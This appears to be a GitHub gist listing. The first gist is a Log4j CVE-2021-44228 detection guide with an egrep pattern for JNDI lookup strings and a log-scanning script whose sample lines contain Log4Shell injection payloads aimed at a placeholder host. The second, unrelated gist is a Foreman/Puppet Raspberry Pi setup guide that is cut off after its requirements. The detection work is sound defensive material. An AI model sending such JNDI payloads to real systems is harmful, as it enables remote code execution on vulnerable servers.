gawainXX / log4j_rce_detection.md
Created December 13, 2021 20:19 — forked from Neo23x0/log4j_rce_detection.md
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against the Log4j RCE vulnerability CVE-2021-44228.

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in the folder /var/log and all of its subfolders:

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
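
The same pattern extended to rotated, gzip-compressed logs, which the command above skips. This is an added example, not part of the original gist; the names scan_log4j and make_sample_logs and the sample log lines are constructed for illustration.

```shell
#!/bin/sh
# Added example. Pattern copied verbatim from the egrep command above.
LOG4J_RE='\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+'

# scan_log4j DIR  (hypothetical helper name)
# Prints "file:matching line" for hits in plain and gzip-compressed logs.
scan_log4j() {
    # Plain files: -I ignores binary files (so .gz is skipped here),
    # -i is case-insensitive, -r recurses, -H always prints the file name.
    grep -E -I -i -r -H "$LOG4J_RE" "$1" 2>/dev/null || true
    # Rotated logs: decompress each .gz to stdout and label every hit.
    find "$1" -type f -name '*.gz' 2>/dev/null | while IFS= read -r gz; do
        gzip -dc "$gz" 2>/dev/null | grep -E -i "$LOG4J_RE" |
            while IFS= read -r hit; do printf '%s:%s\n' "$gz" "$hit"; done
    done
    return 0
}

# make_sample_logs DIR: constructed log lines, hosts under example.invalid.
make_sample_logs() {
    {
        printf '%s\n' '203.0.113.7 - - [13/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"'
        printf '%s\n' '203.0.113.8 - - [13/Dec/2021:10:00:02 +0000] "GET /?q=$%7Bjndi:rmi://example.invalid/b%7D HTTP/1.1" 404 0 "-" "-"'
        printf '%s\n' '198.51.100.2 - - [13/Dec/2021:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.74.0"'
    } > "$1/access.log"
    printf '%s\n' '203.0.113.9 - - [12/Dec/2021:09:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "${JNDI:DNS://example.invalid/c}"' |
        gzip -c > "$1/access.log.1.gz"
}

# Demo on a throwaway directory; point scan_log4j at /var/log for real use.
demo_dir=$(mktemp -d)
make_sample_logs "$demo_dir"
scan_log4j "$demo_dir"
rm -rf "$demo_dir"
```

The demo reports the two suspicious lines in access.log and the one inside access.log.1.gz, and leaves the benign request out.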
gawainXX / Foreman_Puppet_7.x_Raspbian.md
Last active January 25, 2023 07:24 — forked from aaroncoffey/Puppet_6.3_Raspbian.md
How to add a Raspberry Pi 10 (Buster) agent device to Foreman for management and Remote Execution

These instructions were tested on a Pi 3B and a Pi 4B with the latest version of Raspbian (Raspbian GNU/Linux 10 (Buster)).

This guide assumes basic competency with the command line. It also assumes your Foreman Proxy/Server and the client device you are going to be managing meet the following criteria.

Raspberry Device Configuration Requirements

  • OS is Raspbian 10 Buster (armhf)
  • Root is enabled with a set password.
  • SSH is enabled, with PermitRootLogin set to either prohibit-password or yes in /etc/ssh/sshd_config